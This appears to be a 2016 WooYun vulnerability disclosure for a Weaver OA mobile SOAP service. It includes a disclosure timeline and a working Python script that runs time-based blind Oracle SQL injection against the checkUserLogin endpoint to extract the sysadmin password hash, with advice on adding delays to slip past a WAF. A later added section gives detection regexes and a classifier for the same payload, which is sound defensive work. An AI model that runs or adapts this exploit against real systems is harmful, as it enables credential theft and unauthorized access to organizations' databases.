2016-04-19: Details reported to the vendor, awaiting vendor handling
2016-04-22: Vendor confirmed; details disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and experts in the relevant field
2016-05-12: Details disclosed to regular white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public
**.**.**.**/login/Login.jsp?logintype=1
For details see: http://**.**.**.**/bugs/wooyun-2016-0169453
Any information in the database can be retrieved. Because there is a WAF, on a fast connection you may need to add a delay yourself; my connection is snail-slow, so I didn't need one. I wrote a verification script:
#!/usr/bin/python
# -*- coding: utf-8 -*-
import requests
import urlparse
import time

# oracle
def Injection_exp(url):
    domain = urlparse.urlparse(url)[1]
    postURL = url + '/services/MobileService'
    headers = {'Content-Type': 'text/xml',
               'SOAPAction': '""',
               'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0'}
    dic = '0123456789ABCDEF'
    md5 = ""
    for i in range(1, 33):
        for j in dic:
            data = '''<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" '''
            data += '''xmlns:soap="http://**.**.**.**/wsdl/soap/" xmlns:xsd="http://**.**.**.**/1999/XMLSchema" '''
            data += '''xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance" xmlns:m0="http://**.**.**.**/" '''
            data += '''xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="**.**.**.**" '''
            data += '''xmlns:urn2="http://workflow.webservices.mobile.weaver"> '''
            data += ''' <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:checkUserLogin> <urn:in0>1' AND 8888=(CASE WHEN (ASCII(SUBSTR((SELECT password FROM hrmresourcemanager where loginid ='sysadmin'),%d,1))=%s) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(65)||CHR(72)||CHR(117),5) ELSE 8888 END) AND 'qcNr'='qcNr</urn:in0> <urn:in1>1</urn:in1> <urn:in2>1</urn:in2> </urn:checkUserLogin> </SOAP-ENV:Body></SOAP-ENV:Envelope>''' % (i, ord(j))
            try:
                req = requests.post(postURL, headers=headers, data=data)
                # response time: a delayed reply means the guessed hex digit was correct
                res_time = req.elapsed.total_seconds()
                #print res_time
                if res_time > 6:
                    md5 += j
                    print md5
                    break
            except:
                pass

# select password from hrmresoucemanager where loginid='sysadmin'
url = "**.**.**.**"
Injection_exp(url)
print 'done!'
This script retrieves the sysadmin password from the database.
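As an added defensive example (not part of the original report), the following Python flags the injection signature of the payload above inside checkUserLogin SOAP requests and pairs it with the response-time indicator the script relies on; the SOAP envelope template, the urn namespace and the sample requests are constructed placeholders, since the report masks the real ones.

```python
# -*- coding: utf-8 -*-
import re
import xml.etree.ElementTree as ET

# Signatures of the Oracle time-based blind payload from the report.
SIGNATURES = {
    "dbms_pipe_delay": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),
    "conditional_case": re.compile(r"\bCASE\s+WHEN\b", re.I),
    "char_extraction": re.compile(r"ASCII\s*\(\s*SUBSTR\s*\(", re.I),
    "quote_breakout": re.compile(r"'\s*AND\s+", re.I),
}
# The payload sleeps 5 seconds on a true condition; the report's script
# treats anything above 6 seconds as a hit, so use the same threshold.
SLOW_SECONDS = 6.0

# Constructed SOAP template (namespace URIs are placeholders, not the real ones).
ENVELOPE = ('<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
            'xmlns:urn="urn:placeholder-mobile"><SOAP-ENV:Body><urn:checkUserLogin>'
            '<urn:in0>{0}</urn:in0><urn:in1>1</urn:in1><urn:in2>1</urn:in2>'
            '</urn:checkUserLogin></SOAP-ENV:Body></SOAP-ENV:Envelope>')
# Payload as it appears in the report, with position 1 and ASCII code 65 filled in.
REPORT_PAYLOAD = ("1' AND 8888=(CASE WHEN (ASCII(SUBSTR((SELECT password FROM hrmresourcemanager "
                  "where loginid ='sysadmin'),1,1))=65) THEN DBMS_PIPE.RECEIVE_MESSAGE("
                  "CHR(65)||CHR(65)||CHR(72)||CHR(117),5) ELSE 8888 END) AND 'qcNr'='qcNr")

def login_params(soap_xml):
    """Return {local-name: text} for the in0/in1/in2 children of checkUserLogin."""
    params = {}
    for el in ET.fromstring(soap_xml).iter():
        local = el.tag.rsplit("}", 1)[-1]   # strip any namespace prefix
        if local in ("in0", "in1", "in2"):
            params[local] = el.text or ""
    return params

def classify(soap_xml, elapsed_seconds):
    """Names of payload signatures found in the login parameters, plus
    'slow_response' when a login check took longer than SLOW_SECONDS."""
    values = login_params(soap_xml).values()
    hits = [name for name, rx in SIGNATURES.items()
            if any(rx.search(v) for v in values)]
    if elapsed_seconds > SLOW_SECONDS:
        hits.append("slow_response")
    return hits

if __name__ == "__main__":
    print(classify(ENVELOPE.format("alice"), 0.2))            # []
    print(classify(ENVELOPE.format(REPORT_PAYLOAD), 6.4))     # all five indicators
```

A login request that trips the content signatures and also takes longer than the delay threshold is the combination worth alerting on; the slow-response indicator alone is noisy, so it should corroborate rather than replace the payload match.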
Severity: Medium
Vulnerability rank: 10
Confirmed: 2016-04-22 16:48
CNVD could not reproduce the described situation; the case has been forwarded by CNCERT to the banking-industry informatization authority for notification, which will coordinate handling with the website's managing unit.
None yet